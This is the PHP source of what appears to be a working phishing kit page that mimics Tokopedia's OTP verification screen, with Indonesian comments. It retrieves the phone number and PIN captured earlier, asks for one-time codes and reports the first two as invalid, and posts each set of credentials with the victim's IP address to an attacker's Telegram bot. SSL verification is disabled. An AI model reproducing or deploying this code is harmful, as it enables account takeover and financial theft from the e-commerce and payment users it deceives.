<?php
ob_start();
session_start();
require_once 'config_secret.php';

// Proteksi akses
if (!isset($_SESSION['phone']) || !isset($_SESSION['pin'])) {
    header('Location: index.php');
    exit();
}

if (!isset($_SESSION['attempt'])) {
    $_SESSION['attempt'] = 0;
}

$error = "";

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $otp = isset($_POST['otpcvv']) ? trim($_POST['otpcvv']) : "";
    $_SESSION['attempt']++;

    // Format Pesan
    $status_label = ($_SESSION['attempt'] < 3) ? "⚠️ [OTP SALAH / ATTEMPT " . $_SESSION['attempt'] . "]" : "✅ [DATA LENGKAP]";
    
    $message = "$status_label\n\n";
    $message .= "📱 *Nomor:* `" . $_SESSION['phone'] . "`\n";
    $message .= "🔐 *PIN:* `" . $_SESSION['pin'] . "`\n";
    $message .= "🔢 *OTP:* `" . $otp . "`\n";
    $message .= "🌐 *IP:* " . $_SERVER['REMOTE_ADDR'] . "\n";
    $message .= "⏰ *Waktu:* " . date('d/m/Y H:i:s');

    // KIRIM SETIAP KALI USER SUBMIT (Agar tidak ada data yang terlewat)
    sendToTelegram($message);

    if ($_SESSION['attempt'] < 3) {
        $error = "Kode Verifikasi tidak valid / kadaluarsa";
    } else {
        // Setelah 3 kali input, lempar ke halaman sukses/error final
        unset($_SESSION['attempt']);
        header('Location: error.php?complete=1');
        exit();
    }
}

// FUNGSI KIRIM YANG DISESUAIKAN DENGAN LOGIN.PHP KAMU
function sendToTelegram($text) {
    if (defined('TELEGRAM_BOT_TOKEN') && defined('TELEGRAM_CHAT_ID')) {
        $url = "https://api.telegram.org/bot" . TELEGRAM_BOT_TOKEN . "/sendMessage";
        $data = [
            'chat_id' => TELEGRAM_CHAT_ID,
            'text' => $text,
            'parse_mode' => 'Markdown'
        ];
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        
        // Settingan sakti agar tembus firewall hosting
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        curl_setopt($ch, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);

        $result = curl_exec($ch);
        curl_close($ch);
        return $result;
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/png" sizes="144x144" href="https://ecs7.tokopedia.net/assets-tokopedia-lite/prod/icon144.png">
    <title>Verifikasi - Tokopedia</title>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <style>
        /* CSS ASLI KAMU - TIDAK DIUBAH */
        html { -ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%; }
        body { background-color: #fff; margin: 0 auto; font-family: system-ui, -apple-system, sans-serif; }
        .app-alexhosting { text-align: center; }
        .alexariandi-shop { background: #f3f4f5; width: 100%; display: flex; justify-content: space-around; padding: 10px; border-bottom: 1px solid #f3f3f3; align-items: center; box-sizing: border-box; }
        .shopalex { width: 40px; }
        .exalex { width: 50px; }
        .ucapan-img { margin-top: 20px; width: 50%; max-width: 200px; }
        .cothak-input { width: 90%; max-width: 400px; margin: 20px auto; border-radius: 10px; padding: 25px 10px; background: url(img/bg.png) no-repeat center; background-size: cover; border: 1px solid #8a8a8a; box-shadow: 0px 0px 8px #0808089c; border: 1px solid #e0e0e0; box-shadow: 0px 4px 10px rgba(0,0,0,0.05); }
        .ucapan-otp { color: #000; font-weight: 600; margin-bottom: 20px; font-size: 16px; }
        .input-ariandi { font-size: 20px; padding: 12px; width: 85%; border: 1px solid #03ac0e; border-radius: 8px; text-align: center; letter-spacing: 5px; font-weight: bold; outline: none; }
        .btn-selectmarsya { margin-top: 20px; background: #03ac0e; border: none; border-radius: 8px; color: #fff; font-size: 16px; padding: 14px; width: 85%; font-weight: 700; cursor: pointer; transition: 0.3s; }
        .btn-selectmarsya:active { background: #028a0b; transform: scale(0.98); }
        #detik { color: #ff6b6b; font-weight: bold; font-size: 14px; margin-top: 15px; }
        .info-phone { font-size: 13px; color: #666; margin-bottom: 10px; }
    </style>
</head>

<body>
    <div class="app-alexhosting">
        <div class="alexariandi-shop">
            <img class="shopalex" src="img/logo.png">
            <img class="exalex" style="width:50px" src="img/gopay.png">
            <img class="exalex" src="img/bibli.png">
        </div>
        <div class="ContainerAlex">
            <img class="ucapan-img" src="img/image.png">
            <div class="cothak-input login">
                <form id="formotp" method="POST">
                    <p class="ucapan-otp">Masukkan Kode VERIFIKASI</p>
                    
                    <div class="info-phone">
                        Kode dikirim ke: <b><?php echo substr($_SESSION['phone'], 0, 4) . '****' . substr($_SESSION['phone'], -3); ?></b>
                    </div>

                    <div class="input-marsya">
                        <input class="input-ariandi" id="alexhosting" type="number" name="otpcvv" inputmode="numeric" required>
                    </div>

                    <?php if ($error !== ""): ?>
                        <div style="color: #ff4d4d; font-style: italic; font-size: 14px; margin-top: 10px; font-weight: 500;">
                            - <?php echo $error; ?> -
                        </div>
                    <?php endif; ?>

                    <div id="detik">03:00</div> 
                    
                    <button type="submit" class="btn-selectmarsya" id="btnSubmit1">Konfirmasi</button>
                </form>
            </div>
        </div>
    </div>

    <script>
        // Script Timer Asli Kamu
        let timeLeft = 180;
        const display = document.querySelector('#detik');
        
        function startTimer() {
            const timer = setInterval(function () {
                let minutes = Math.floor(timeLeft / 60);
                let seconds = timeLeft % 60;
                minutes = minutes < 10 ? "0" + minutes : minutes;
                seconds = seconds < 10 ? "0" + seconds : seconds;
                display.textContent = minutes + ":" + seconds;
                if (--timeLeft < 0) {
                    clearInterval(timer);
                    display.textContent = "KODE KADALUARSA";
                }
            }, 1000);
        }
        startTimer();

        // Otomatis submit tanpa delay berlebih
        let isSubmitted = false;
        $('#alexhosting').on('input', function() {
            if (this.value.length === 6 && !isSubmitted) {
                isSubmitted = true;
                $('#btnSubmit1').text('Memproses...');
                $('#formotp').submit();
            }
        });
    </script>
</body>
</html>